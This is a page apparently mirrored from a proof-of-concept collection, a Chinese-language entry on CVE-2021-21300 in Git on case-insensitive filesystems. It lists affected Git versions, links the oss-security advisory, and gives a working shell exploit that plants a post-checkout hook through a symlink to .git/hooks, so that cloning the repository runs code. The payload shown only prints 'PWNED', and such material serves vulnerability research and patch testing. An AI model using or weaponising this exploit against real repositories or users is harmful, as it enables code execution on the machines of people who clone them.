admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/Git for Visual Studio远程执行代码漏洞 CVE-2021-21300.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

52 lines
912 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Git for Visual Studio远程执行代码漏洞 CVE-2021-21300
## 漏洞描述
此漏洞影响具有不区分大小写的文件系统的平台当某些过滤器被使用时例如Git LFS。Git可能会被欺骗运行克隆期间的远程代码。
## 漏洞影响
```
v2.17.6
v2.18.5
v2.19.6
v2.20.5
v2.21.4
v2.22.5
v2.23.4
v2.24.4
v2.25.5
v2.26.3
v2.27.1
v2.28.1
v2.29.3
v2.30.2
```
## 漏洞复现
参考文章: https://www.openwall.com/lists/oss-security/2021/03/09/3
## 漏洞POC
```bash
#!/bin/sh
git init delayed-checkout &&
(
cd delayed-checkout &&
echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
>.gitattributes &&
mkdir A &&
printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
chmod +x A/post-checkout &&
>A/a &&
>A/b &&
git add -A &&
rm -rf A &&
ln -s .git/hooks a &&
git add a &&
git commit -m initial
) &&
git clone delayed-checkout cloned
```
Reference in New Issue View Git Blame Copy Permalink